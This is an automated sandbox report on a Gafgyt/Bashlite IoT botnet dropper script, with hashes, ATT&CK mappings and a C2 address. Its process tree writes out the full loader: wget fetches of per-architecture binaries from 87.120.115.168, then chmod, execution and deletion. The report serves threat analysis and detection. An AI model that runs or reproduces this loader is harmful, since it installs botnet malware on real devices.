gafgyt | f970e2afe2d0fab6fbf2eab0e3d1e555d3fed10a6bf1b7929069f12689d28985

Analysis

max time kernel
132s
max time network
136s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
06-12-2024 13:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sex.sh
Size

1KB
MD5

3189d19ad6f6f1da0267b0390a050ceb
SHA1

eadeb7723eac480febdf3a5dba6452c0f8e1b710
SHA256

f970e2afe2d0fab6fbf2eab0e3d1e555d3fed10a6bf1b7929069f12689d28985
SHA512

143874393ca2612bbfc81d451f16c45eab4c0c119fe0fa63a3ce6c74baba6dade2d0a241694dff2d4470228853f82dc6d4dc2ede4f18128de2c70cb27ac9a526

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

87.120.115.168:23

Signatures

Detected Gafgyt variant 10 IoCs

resource	yara_rule
behavioral1/files/fstream-1.dat	family_gafgyt
behavioral1/files/fstream-2.dat	family_gafgyt
behavioral1/files/fstream-3.dat	family_gafgyt
behavioral1/files/fstream-4.dat	family_gafgyt
behavioral1/files/fstream-5.dat	family_gafgyt
behavioral1/files/fstream-6.dat	family_gafgyt
behavioral1/files/fstream-7.dat	family_gafgyt
behavioral1/files/fstream-8.dat	family_gafgyt
behavioral1/files/fstream-9.dat	family_gafgyt
behavioral1/files/fstream-10.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1507	chmod
1525	chmod
1533	chmod
1543	chmod
1548	chmod
1553	chmod
1492	chmod
1497	chmod
1502	chmod
1511	chmod
1516	chmod
1520	chmod
1538	chmod

Executes dropped EXE 10 IoCs

ioc	pid	Process
/tmp/mips	1493	mips
/tmp/mipsel	1498	mipsel
/tmp/sh4	1503	sh4
/tmp/arm61	1512	arm61
/tmp/ppc	1521	ppc
/tmp/586	1526	586
/tmp/m68k	1534	m68k
/tmp/dc	1539	dc
/tmp/dss	1544	dss
/tmp/co	1549	co

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/misc/watchdog	586
File opened for modification	/dev/watchdog	586

Changes its process name 1 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	1526	586

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1500	rm
1479	wget
1493	mips
1495	rm
1496	wget
1498	mipsel

Writes file to tmp directory 10 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/mips	wget
File opened for modification	/tmp/sh4	wget
File opened for modification	/tmp/586	wget
File opened for modification	/tmp/dc	wget
File opened for modification	/tmp/dss	wget
File opened for modification	/tmp/mipsel	wget
File opened for modification	/tmp/arm61	wget
File opened for modification	/tmp/ppc	wget
File opened for modification	/tmp/m68k	wget
File opened for modification	/tmp/co	wget

/tmp/sex.sh
/tmp/sex.sh
1⤵
PID:1478
- /usr/bin/wget
  wget http://87.120.115.168/mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1479
- /bin/chmod
  chmod +x mips
  2⤵
  - File and Directory Permissions Modification
  PID:1492
- /tmp/mips
  ./mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:1493
- /bin/rm
  rm -rf mips
  2⤵
  - System Network Configuration Discovery
  PID:1495
- /usr/bin/wget
  wget http://87.120.115.168/mipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1496
- /bin/chmod
  chmod +x mipsel
  2⤵
  - File and Directory Permissions Modification
  PID:1497
- /tmp/mipsel
  ./mipsel
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:1498
- /bin/rm
  rm -rf mipsel
  2⤵
  - System Network Configuration Discovery
  PID:1500
- /usr/bin/wget
  wget http://87.120.115.168/sh4
  2⤵
  - Writes file to tmp directory
  PID:1501
- /bin/chmod
  chmod +x sh4
  2⤵
  - File and Directory Permissions Modification
  PID:1502
- /tmp/sh4
  ./sh4
  2⤵
  - Executes dropped EXE
  PID:1503
- /bin/rm
  rm -rf sh4
  2⤵
  PID:1505
- /usr/bin/wget
  wget http://87.120.115.168/x86
  2⤵
  PID:1506
- /bin/chmod
  chmod +x x86
  2⤵
  - File and Directory Permissions Modification
  PID:1507
- /tmp/x86
  ./x86
  2⤵
  PID:1508
- /bin/rm
  rm -rf x86
  2⤵
  PID:1509
- /usr/bin/wget
  wget http://87.120.115.168/arm61
  2⤵
  - Writes file to tmp directory
  PID:1510
- /bin/chmod
  chmod +x arm61
  2⤵
  - File and Directory Permissions Modification
  PID:1511
- /tmp/arm61
  ./arm61
  2⤵
  - Executes dropped EXE
  PID:1512
- /bin/rm
  rm -rf arm61
  2⤵
  PID:1514
- /usr/bin/wget
  wget http://87.120.115.168/i686
  2⤵
  PID:1515
- /bin/chmod
  chmod +x i686
  2⤵
  - File and Directory Permissions Modification
  PID:1516
- /tmp/i686
  ./i686
  2⤵
  PID:1517
- /bin/rm
  rm -rf i686
  2⤵
  PID:1518
- /usr/bin/wget
  wget http://87.120.115.168/ppc
  2⤵
  - Writes file to tmp directory
  PID:1519
- /bin/chmod
  chmod +x ppc
  2⤵
  - File and Directory Permissions Modification
  PID:1520
- /tmp/ppc
  ./ppc
  2⤵
  - Executes dropped EXE
  PID:1521
- /bin/rm
  rm -rf ppc
  2⤵
  PID:1523
- /usr/bin/wget
  wget http://87.120.115.168/586
  2⤵
  - Writes file to tmp directory
  PID:1524
- /bin/chmod
  chmod +x 586
  2⤵
  - File and Directory Permissions Modification
  PID:1525
- /tmp/586
  ./586
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Changes its process name
  PID:1526
- /bin/rm
  rm -rf 586
  2⤵
  PID:1529
- /usr/bin/wget
  wget http://87.120.115.168/m68k
  2⤵
  - Writes file to tmp directory
  PID:1531
- /bin/chmod
  chmod +x m68k
  2⤵
  - File and Directory Permissions Modification
  PID:1533
- /tmp/m68k
  ./m68k
  2⤵
  - Executes dropped EXE
  PID:1534
- /bin/rm
  rm -rf m68k
  2⤵
  PID:1536
- /usr/bin/wget
  wget http://87.120.115.168/dc
  2⤵
  - Writes file to tmp directory
  PID:1537
- /bin/chmod
  chmod +x dc
  2⤵
  - File and Directory Permissions Modification
  PID:1538
- /tmp/dc
  ./dc
  2⤵
  - Executes dropped EXE
  PID:1539
- /bin/rm
  rm -rf dc
  2⤵
  PID:1541
- /usr/bin/wget
  wget http://87.120.115.168/dss
  2⤵
  - Writes file to tmp directory
  PID:1542
- /bin/chmod
  chmod +x dss
  2⤵
  - File and Directory Permissions Modification
  PID:1543
- /tmp/dss
  ./dss
  2⤵
  - Executes dropped EXE
  PID:1544
- /bin/rm
  rm -rf dss
  2⤵
  PID:1546
- /usr/bin/wget
  wget http://87.120.115.168/co
  2⤵
  - Writes file to tmp directory
  PID:1547
- /bin/chmod
  chmod +x co
  2⤵
  - File and Directory Permissions Modification
  PID:1548
- /tmp/co
  ./co
  2⤵
  - Executes dropped EXE
  PID:1549
- /bin/rm
  rm -rf co
  2⤵
  PID:1551
- /usr/bin/wget
  wget http://87.120.115.168/scar
  2⤵
  PID:1552
- /bin/chmod
  chmod +x scar
  2⤵
  - File and Directory Permissions Modification
  PID:1553
- /tmp/scar
  ./scar
  2⤵
  PID:1554
- /bin/rm
  rm -rf scar
  2⤵
  PID:1555

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/586

Filesize
94KB

MD5
38a73612d29ba094d452f3cc8e7c94c1

SHA1
9303de7519570e29faab1e2ca92788f3659f8c59

SHA256
4296434a818a2c743e10bac1e9e5ddeeefaa2dc3c3dfc538d3bd1063c38e523a

SHA512
f2cbf8e86cdee08fbde3ebf18313325a18fa3e9d2a07e5bfaf816a52721e086c4ffd40f2f29170ff66329f6bd6c3a308fd7bbfbf13fd60787bc8fc3dbb06eda7

Download Submit
/tmp/arm61

Filesize
136KB

MD5
75139e27f4e6caeb834fea23104f9943

SHA1
dbd370a62f724e83e734b3012ffab42126ad5883

SHA256
f24cc0d41c2d7b7dbbbb5eea02ec271403d8d80248222f398632f7ba3fdecc9c

SHA512
bfe603bf83d3b3ff1e902d0b203d7d6c737013e93e05c285e1aa8553fe6364a16897d2afbe2a62a587c05e9474a7d984487073d21fdf6d4fb49f15f711037fc1

Download Submit
/tmp/co

Filesize
117KB

MD5
2e41dcc24f803583b3edd434f54cd318

SHA1
9c07b5d98a600647a60b3f7ab9546fa023276882

SHA256
3a3417ada962d7e97f9d95904437145c304bb2d9198c3965561a41593afdb8a8

SHA512
3aedb8bae0239cb6c15f0bf15729c669e328cac06f07569a01dff395fd46a0a67f50d7498d8af45c89d6d433c76ac17b013e2733eda77a8583073ec06da380a2

Download Submit
/tmp/dc

Filesize
123KB

MD5
2f496cbb94d8b6cba904bb180d46751a

SHA1
0a069456f8ba320f34336c1d2904a052f7b372e3

SHA256
d87be2d4e28af40f112f993955ef4df85dfafd87f2056c09d0cf47e485846495

SHA512
455b6db26a425233da7c0a95648c7d269da43b58f012bca6c4a87213f04cfd1a70eb1eeda34a488d3c6a47b1c6dadf91617174e5ed6b645355f82a231e375218

Download Submit
/tmp/dss

Filesize
124KB

MD5
2541811343183a25a14623e2a1a3af5c

SHA1
17a5a0423c399a43925c21d8bf10bfc093d77db6

SHA256
5aed75441b46da6a03838e23fe22cfbc0232be98a72b897e51770260f17726d2

SHA512
bda4df6e513a81d75cec13e78bf1915f1caa96136d09e06f880c567724b1fa1be329cd5916119f876524528ae4a383578ac6e53fe662fae1a1833b59de160c4d

Download Submit
/tmp/m68k

Filesize
111KB

MD5
723d0dfea98e13ecb6fa9eed08c04685

SHA1
56ce18b2833025eccf489a1fccdd35455ac13b7b

SHA256
66afdb56525d558935ceb1ea4cbd8129235219c20cab2020ea40ed954e184f6d

SHA512
0d812c63ce25f83d7b7a8e854f3b756c333dc5bfee6729235a7083e5ef1b3a9eeac255eae9f02a19387eadc1ba8ec18137e5f9a3b64435b5e0cf634dd9a40b95

Download Submit
/tmp/mips

Filesize
148KB

MD5
87e0d903a571fcfcca6775bd599d4f2a

SHA1
9d5c8f78a5505e4b0a919d620ba6686af5ef5651

SHA256
1b87993b8c4aeb9bfdf718c7feef1f239f2ebcbcbd5a57e20a54d15aec8ace7a

SHA512
afdc4156c36a365821fc4910dbbc293177ea2e21b3565412337fae1574abda0d651cfe150e0bea6baccde3331d5a5e08d18bc91e509009431916706d82394717

Download Submit
/tmp/mipsel

Filesize
148KB

MD5
46cbc029673bbee94214d310d52e5944

SHA1
411726306a0f0ad673e0b20d9896679d20048bcb

SHA256
7402ed7191a0e117e488ddf812caa0a96896c9d3ba6934c106f3af8d66767995

SHA512
915643c7256f1c12dce3797b3e258f02bc5b131516276b26e6c86d0a585fd1e4cbd39fcc674c828581689fc89a3ca11a29c2fb723fe4e55174d5231703a836f2

Download Submit
/tmp/ppc

Filesize
110KB

MD5
311c10fc1cb994c0bf173c729b841c72

SHA1
43036b9d903d97dc52cc1fcd9b90abb7f8ba9a30

SHA256
b0c191bc357a297451490fcda95bff759c3295128ec92bf8de110f3edf555a8c

SHA512
7bf845764c070269cfca30c90004aa41a90bf96653b4608c783104be8470be30e00f833cd50ee29651790720cb60da9369087a9ab23b1620414e6fb499ac6c5d

Download Submit
/tmp/sh4

Filesize
105KB

MD5
d781ac0877767e8a916bd14cb1d9fa2f

SHA1
59cb9a19dae2897de098909eba99ea4e406c5cdc

SHA256
b4a8570ac0c170d1604cfe4874da07ef87cc00d12f200a73f8e6ddf39c51f580

SHA512
223c1d1997899266ce629e06a3967f1fe3041911f8ad8f572d9a6a355c73b0405399363b230e70e6bc6b3daecf93d735465bc1d1ad70ba72dd5e25f5659c6d68

Download Submit